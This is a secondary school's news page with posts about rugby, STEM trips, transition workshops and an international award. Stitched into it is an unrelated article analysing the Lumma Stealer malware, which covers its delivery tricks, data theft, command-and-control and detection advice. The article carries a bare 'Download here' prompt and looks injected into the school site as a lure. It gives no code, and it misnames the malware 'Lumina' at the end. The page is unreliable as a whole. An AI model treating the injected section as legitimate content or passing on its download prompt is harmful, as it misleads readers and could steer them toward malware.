decadmin

Home
decadmin

Dallaglio Rugbyworks Festival

The children represented the school brilliantly throughout the day, playing fantastically well as a team. Their teamwork, determination and positive attitude saw them progress all the way to the final. Unfortunately, they narrowly missed out on the trophy, but reaching the final was a tremendous achievement and one they should all be incredibly proud of.

A brilliant day was had by all, and the pupils were excellent ambassadors for our school both on and off the field. If you see any of the children involved around school, please take a moment to congratulate them on their efforts and achievements.

A special mention must go to Denise G, who was awarded a sportsmanship award by the CEO of Dallaglio Rugbyworks in recognition of her outstanding conduct and attitude throughout the matches. This is a wonderful achievement and reflects the values we strive to promote.

We should also recognise Etham Y, whose “samba feet” footwork provided some memorable moments and certainly entertained everyone watching!

Well done to all involved for a fantastic day of rugby and for representing the school so positively!!

General - 06/25/2026

School Closure

Due to the extreme heat we will be closing at 1pm today (Wednesday 24th June). Please complete the MS form sent to all parents.

School will be closed to all pupils: Thursday 25th June and Friday 26th June

More Information: HERE

Access Remote Learning HERE

General - 06/24/2026

Year 8 STEM Science Fair

Fourteen Year 8 students recently attended a STEM Science Fair, where they took part in a range of engaging workshops, interactive sessions, and hands-on activities designed to inspire future scientists, engineers, and innovators.

The day began with students exploring stalls hosted by external companies and organisations. Activities included virtual reality experiences, reaction time challenges, flight aerodynamics demonstrations, and a variety of problem-solving tasks that encouraged critical thinking and teamwork.

One of the highlights of the day was a fascinating lecture entitled How to Freeze a Human. Students learned about advances in preserving organs for transplantation and how this research could help save lives in the future. Several of our students confidently volunteered to assist during the session, demonstrating enthusiasm and a willingness to engage with complex scientific concepts.

Students also took part in a workshop led by the Air League, exploring the problem-solving skills required in aviation. Working alongside students from another school within the Matrix Trust, they completed a series of teamwork challenges that developed their communication, leadership, and analytical skills.

Throughout the day, our students impressed both the presenters and the visiting companies with their enthusiasm, resilience, and exceptional problem-solving abilities. Several members of staff commented on how brilliantly they approached challenges, with some students successfully solving problems that no other groups had managed to complete. Their maturity, teamwork, and determination were praised throughout the event.

The day concluded with a visit to the Thinktank, where students explored a variety of immersive exhibits, interactive games, and hands-on science stations.

The trip was a fantastic experience, providing valuable insight into the many opportunities available within STEM careers. Our Year 8 students were a real asset to both the school and themselves, representing the school with pride while demonstrating the confidence, curiosity, and talent that will undoubtedly support their future success.

General - 06/18/2026

Girls of Brum Day!

On Thursday 11^th June, Miss Hart took 11 Year 7 Girls to attend the 'Girls of Brum' Day, held at the Alexander Stadium.

Centred around empowering young girls in all areas of life, but particularly sport, the day consisted of inspirational talks from famous athletes, interactive stalls run by a range of sports organisations, youth clubs and community projects, along with an afternoon of sports workshops.

The girls had the opportunity to learn more about what is available to them in the local area and take part in sports, like cricket, golf and cycling, that they wouldn't normally take part in, and had an amazing time making friendship bracelets, getting glitter tattoos, writing positive affirmations, learning dance routines and more!

Overall, it was amazing day to celebrate what women can do!

General - 06/12/2026

Year 10 Mock Interviews a Great Success

Our Year 10 students recently took part in a highly successful Mock Interview Day, with over 24 employers and industry professionals generously giving their time to support the event.

Students experienced realistic interview situations, helping them to develop their confidence, communication skills and understanding of employers’ expectations. The opportunity to receive personalised feedback from professionals was invaluable and will help them prepare for future college, apprenticeship and employment opportunities.

The employers were full of praise for our students, commenting on their enthusiasm, politeness and willingness to engage. The feedback received was overwhelmingly positive, with many highlighting the excellent attitudes and potential demonstrated by our young people.

We would like to extend our sincere thanks to all the employers who volunteered their time and expertise to make the day such a success. Their support plays a vital role in preparing our students for the world of work and inspiring their future aspirations.

General - 06/12/2026

British Council International School Award success for Dame Elizabeth Cadbury School

Dame Elizabeth Cadbury School in Bournville has been awarded Intermediate level of the British Council’s prestigious International School Award in recognition of its work to bring the world into the classroom.

The International School Award celebrates the achievements of schools that do exceptional work in international education. Fostering an international dimension in the curriculum is at the heart of the British Council’s work with schools so that young people gain the cultural understanding and skills they need for life and work in today’s world.

Shannon West, Head of UK Schools for the British Council, said: Dame Elizabeth Cadbury's international work has earned the school well-deserved recognition with the British Council International School Award - Intermediate Certificate.

We are proud and delighted to work with this great school. Many thanks to everyone for all their commitment to developing international work and sharing excellent classroom practice and resources. This is enriching education for its pupils, and their excellent collaborative projects with partner schools overseas are bringing the world into their classrooms. International work is key support for developing skills young people need to be globally aware citizens of the future.

Embedding an international ethos across a school can lead to International School Award Accreditation, the highest award level. Schools looking to join this supportive and engaging global network should contact us at the British Council”.

The Award is now available worldwide in countries such as Greece, India, and Nigeria. Over 6000 International School Awards have been presented to successful schools in the UK since the scheme began in 1999.

The International School Award encourages and supports schools to develop:

An international ethos embedded throughout the school
A whole school approach to international work
Collaborative curriculum-based work with international partner schools
Year-round international activity
Involvement of the wider community

General - 06/09/2026

Year 6 Transition Workshop Supports Pupils and Families Ahead of September

We were delighted to welcome Year 6 pupils and their parents and carers to our Transition Workshop on 2nd June focused on attendance and a successful start to secondary school.
As part of our transition process, we carefully review information provided by primary schools alongside national attendance data to identify pupils who may benefit from additional support during the move to secondary school. The workshop was designed as a positive and proactive opportunity to help pupils and families feel confident, supported and prepared for September.
During the evening, parents and carers learned about the importance of strong attendance, positive routines and reading habits in supporting pupils' achievement, wellbeing and confidence. Families also explored our STRIVE values, the support available at DEC, and the wide range of enrichment and leadership opportunities that help pupils feel connected to school. We also discussed common transition challenges and how our attendance, pastoral, SEND and wellbeing teams work closely with families to provide early support where needed.
Meanwhile, Year 6 pupils spent time with our fantastic Year 10 Prefects, who answered questions, shared their experiences and helped pupils feel excited about starting secondary school. The prefects represented the school exceptionally well and many have already volunteered to support future transition events, including Induction Day.
We were incredibly pleased to receive positive feedback from parents and carers following the event. Comments included:
“This evening’s workshop was great. It was useful to learn about the transition period.”
“Lots of support available.”
“My child will be cared for.”
“You understand my worries about the transition.”
“My child really enjoyed his time with the Prefects who are a credit to the school.”
“My child really enjoyed spending time with your Year 10s.”
We would like to thank all families who attended, alongside our Year 10 Prefects and staff, for making the evening such a success. We look forward to continuing to support our incoming Year 7 pupils as they prepare for the next exciting stage of their education.

General - 06/08/2026

Lumma's Rise to Prominence: The Success of the MaaS Model

The landscape of cybercrime is defined by relentless evolution, but few threats demonstrate the sheer adaptability and proliferation of Lumma Stealer. Infostealers, in particular, have become the economic engine of the modern cybercrime ecosystem, moving far beyond simple credential harvesting to encompass deep system reconnaissance and wallet extraction. Recent reports indicate a staggering 369% increase in successful infostealer campaigns globally, cementing their status as a top-tier threat. Lumma, or LummaC2, stands out as a particularly sophisticated Malware-as-a-Service (MaaS) operation that has dominated dark web stealer logs, often commanding over 50% of the market share in recent quarters.

👉 Download here: 👈

This article serves as a deep-dive technical analysis into Lumma Stealer. We will dissect its primary delivery mechanisms, meticulously examine its core capabilities and evasion techniques, map its robust Command and Control (C2) infrastructure, and conclude with concrete, actionable recommendations for security teams tasked with detection and mitigation. For IT security professionals, incident responders, and threat hunters, this analysis provides the necessary intelligence to move beyond simple signature matching and into proactive threat hunting.

Background and Rise to Prominence

Lumma Stealer first gained significant notoriety around August 2022. The malware was developed and managed by the alias "Shamel," who quickly established it as a highly profitable and stable platform for cybercriminals. Unlike bespoke malware, Lumma operates on a true MaaS model, allowing threat actors to leverage a powerful, pre-built, and constantly updated threat without needing extensive development resources.

The monetization structure is impressive, featuring tiered pricing ranging from basic access at $250 to highly customized, premium deployments exceeding $20,000. Crucially, the platform provides a full builder panel, enabling operators to customize the malware's functionality, targets, and appearance. Furthermore, the option to purchase the source code allows sophisticated groups to resell the Lumma framework, maximizing ROI. This accessibility has fueled its adoption across the entire criminal spectrum, from novice threat actors to elite groups such as Scattered Spider and Octo Tempest.

Its widespread adoption confirms its technical superiority and operational resilience. Lumma’s dominance is not merely anecdotal; its logs consistently rank among the highest volume infostealers observed across major dark web marketplaces, validating its effectiveness as a generalized credential and data harvester.

Distribution Vectors and Delivery Techniques

Lumma has moved past relying on single, predictable delivery methods. Its success is predicated on a sophisticated, multi-vector approach that ensures high reach and low friction for the victim. Each vector utilizes tailored social engineering and technical execution to achieve infection.

Phishing Emails

Phishing remains the bread and butter of Lumma’s distribution. Attackers leverage highly convincing, urgent lures—fake invoices, urgent reservation confirmations, HR policy updates, or shipping notifications—to entice victims into clicking a malicious link. A critical element of the Lumma delivery chain is the use of Traffic Direction Systems (TDS), such as Prometheus. These systems allow the threat actor to filter incoming traffic in real-time. If a victim is flagged as high-value (e.g., an executive or a system administrator), the TDS can redirect them to a specialized landing page or bypass typical defenses, ensuring the malware is delivered successfully.

Malvertising

Lumma frequently poisons search engine results and online advertisements. By injecting malicious payloads into search results for high-volume, legitimate software (e.g., "Notepad++ download," "Adobe Reader update"), the threat actors redirect users to cloned, compromised websites. These sites are often visually identical to the original and serve as the initial drop point for the Lumma executable or the trigger for a drive-by download.

Compromised Websites (Drive-by Download)

In this vector, the malware is delivered without the user needing to click anything beyond visiting the page. Threat actors inject malicious JavaScript into the source code of legitimate, high-traffic websites. Advanced Lumma deployments utilize EtherHiding, a technique where the actual malicious code is not hosted on a traditional server but is instead stored and served via a decentralized blockchain network, such as Binance Smart Chain (BSC). This makes the code highly resilient to simple domain blocking and takedown efforts.

The "ClickFix" Technique

This highly effective social engineering flow is one of Lumma’s signature methods. The infection chain proceeds as follows: The victim encounters a fake CAPTCHA, an error message, or a prompt on a malicious landing page. The user, believing they must resolve the issue, copies a malicious command string (e.g., a base64 encoded PowerShell command). The user then pastes this command into the Windows Run dialog (Win + R). Execution of this command launches a PowerShell or mshta instance, which subsequently fetches and executes the core Lumma executable, completing the infection.

Trojanized/Pirated Software

Lumma is also bundled into cracked or pirated applications. This is common in distribution channels for KMS activators, gaming cheats, and automated utilities (e.g., GitHub repos hosting Hamster Kombat automation tools). The malware is discreetly injected into the application package, allowing it to execute upon the user's first run, often without the victim realizing they have installed more than just the desired software.

Malware Capabilities & Technical Analysis

Lumma Stealer is not a simple dropper; it is a highly engineered payload designed for maximum stealth and data exfiltration. The core executable is typically written in C/C++ and utilizes inline Assembly (ASM) routines to optimize performance and evade static analysis.

Persistence & Evasion

Lumma employs multiple techniques to ensure it survives system reboots and avoids detection:

Obfuscation: The code is heavily obfuscated using compiler-level techniques, including LLVM transformations and complex Control Flow Flattening. This makes reverse engineering difficult by scrambling the execution path and confusing automated analysis tools.
Process Injection: Lumma rarely runs as a standalone process. It commonly uses process hollowing to inject its malicious code into a trusted, running system process (e.g., msbuild.exe, explorer.exe, svchost.exe). This allows the malware to inherit the process's legitimacy and evade basic process monitoring.
Stealth Persistence: It establishes persistence via suspicious entries in the Windows RunMRU registry keys, or by injecting itself into legitimate Windows services.

Information Stealing

The scope of data stolen is vast and dictated by a configuration file received from the C2. Lumma can be tailored to target specific data types, but its default configuration is comprehensive:

Browser Credentials & Cookies: Full harvesting from Chromium (Chrome, Edge), Mozilla (Firefox), and various proprietary browsers. This includes stored passwords, session cookies, and autofill data.
Cryptocurrency Wallets: Extraction of private keys and seed phrases from popular desktop and browser-based wallets (MetaMask, Exodus, Electrum).
Application Data: Data from critical business and personal applications, including 2FA extension tokens, VPN configuration files, and Telegram chat histories.
System & Document Metadata: Harvesting user documents (PDF, DOCX, XLSX), desktop screenshots, network configuration files, and system environment variables.

C2 Communication

Lumma features a remarkably resilient and layered C2 infrastructure:

Hardcoded and Dynamic C2s: The malware maintains a list of hardcoded C2 domains, ensuring that even if one is seized, communication can immediately pivot to another.
Fallback Mechanisms: If the primary C2 fails, Lumma possesses intelligent fallback mechanisms, routing communication through legitimate services like Steam profiles (using game API calls) and private Telegram channels.
Infrastructure Cloaking: The use of Cloudflare as a ubiquitous proxy service hides the true origin and geographical location of the C2 servers, complicating takedown efforts.
Protocol Evolution: Across different versions (v1 through v6), the C2 protocols have evolved, demonstrating constant refinement. Modern versions utilize strong encryption, typically ChaCha20, to secure the exfiltrated data stream between the victim and the C2 server, preventing passive network monitoring from revealing the stolen payload.

Notable Campaigns & the May 2025 Disruption

Lumma’s operational history is marked by continuous high-volume campaigns. For instance, an April 2025 campaign reported by Microsoft targeted Canadian organizations, demonstrating a shift toward enterprise-level deployment rather than just individual users. This campaign specifically focused on leveraging compromised corporate SharePoint sites as delivery vectors, bypassing traditional perimeter defenses.

The most significant event in Lumma's operational history was the massive collaborative takedown operation in May 2025. This effort, spearheaded by Europol, the FBI, and supported by Microsoft threat intelligence, successfully targeted the core infrastructure.

The impact of the May 2025 operation was staggering: approximately 2,300 to 2,500 domains associated with the Lumma network were seized or suspended. The central management panel, the heart of the MaaS operation, was effectively disrupted, and the primary C2 servers were reportedly wiped clean. This single operation temporarily crippled the profitability and operational capability of the Lumma ecosystem.

However, the aftermath has been complex. While the developer, Shamel, has publicly claimed recovery and the ability to relaunch the platform, law enforcement actions continue to sow distrust, noting that the administrators are already "talking" and rebuilding. This demonstrates the operational agility of the threat actors and the difficulty of achieving a permanent kill-switch against a platform like Lumma.

Detection and Mitigation Recommendations

To defend against Lumma Stealer, organizations must move beyond reactive signature updates and implement layered, behavior-based detection and proactive threat hunting. The following recommendations are critical for reducing the attack surface and neutralizing the threat.

Endpoint Detection & Response (EDR) Hunting

Threat hunters should specifically look for the following behavioral indicators:

Suspicious Parent/Child Process Relationships: Look for mshta.exe or PowerShell instances spawned by unexpected processes (e.g., Word, Outlook) or for processes executing without a visible command line.
Memory Injection: Search for processes exhibiting signs of memory injection, particularly if a legitimate process (like `explorer.exe` or `svchost.exe`) is hosting code from an unusual memory region.
Network Beaconing: Identify repetitive, low-volume outbound network connections to unknown external IPs, especially if the traffic is encrypted (indicating C2 communication).
File Artifacts: Scan for recently dropped files with suspicious names or those exhibiting high entropy (indicating packed or encrypted payloads).

Strategic Defense Measures

Application Control: Implement whitelisting policies to ensure only approved applications can execute, blocking unknown or suspicious executables immediately.
Browser Isolation: Utilize browser isolation technologies to sandbox web browsing, preventing drive-by downloads from executing code directly on the host machine.
Email Gateway Inspection: Configure gateways to deeply inspect attachments (especially Office documents) for embedded scripts (VBA) that trigger the initial payload delivery.
Network Segmentation: Isolate critical assets and segment the network to prevent a successful infection on a low-value endpoint from immediately spreading laterally to the domain controllers.

In conclusion, Lumina is not merely a piece of malware; it is a highly adaptive, professionally maintained platform. Effective defense requires shifting focus from merely blocking known hashes to monitoring and understanding the behavior of the threat.

Uncategorised - 05/08/2026

Pupils attend future Lionesses

Pupils from Dame Elizabeth Cadbury School recently had an exciting opportunity to attend a Future Lionesses football Talent ID Day, where they competed in fast-paced 3v3 games against talented players from across Birmingham. The standard of football on display was exceptional, and our four representatives rose to the occasion brilliantly, showcasing skill, determination and teamwork throughout the event.

All four pupils delivered outstanding performances, consistently impressing coaches with their technical ability and game awareness. Their efforts were recognised with a fantastic achievement: each of them has been invited to attend the next round of county trials.

A special mention goes to Alexa, who particularly caught the attention of the England coaching staff. They have expressed a strong interest in following her development more closely and are keen to stay in contact as she continues her football journey.

This is a remarkable accomplishment for all four players and a proud moment for the school. We look forward to supporting them as they take the next steps in their football pathways.

The pupils were:

Amelia
Kalsi
Alexa
Ronni

General - 05/07/2026

Happy young Asia businessmen and businesswomen meeting brainstorming some new ideas about project to his partner working together planning success strategy enjoy teamwork in small modern home office.

Year 9 Transition Workshop: Preparing for Success

We were delighted to welcome parents and carers to our Year 9 Transition Workshop on 17^th March, focused on supporting pupils as they prepare for the move into Key Stage 4. The session explored the key changes in Year 10, including increased academic challenge, the importance of reading and vocabulary, and how strong routines and independent learning habits underpin GCSE success.

Parents also gained valuable insight into how we support pupils with exam preparation, wellbeing, and access arrangements, alongside practical strategies to support learning at home. A key message throughout the workshop was the significant impact that consistent attendance has on achievement and long-term success.

The feedback from parents and carers was overwhelmingly positive, highlighting how informative and reassuring the session was:

“Really helpful in understanding what Year 10 will look like and how I can support at home.”
“Clear, informative and gave practical advice we can use straight away.”
“It was reassuring to know what support is available for pupils.”

We would like to thank the parents and carers who attended. Workshops like these play an important role in strengthening the partnership between home and school, ensuring every pupil feels confident, supported, and ready for the next stage of their learning journey.

General - 03/19/2026

Popular Pages

Contact Info

Woodbrooke Road, Birmingham,

West Midlands B30 1UL

Contact Number: 0121 464 4040

enquiry@decschool.co.uk

Monday - Friday: 8:00 am - 4:00 pm

Privacy Notice

Cookie	Duration	Description
cookielawinfo-checbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.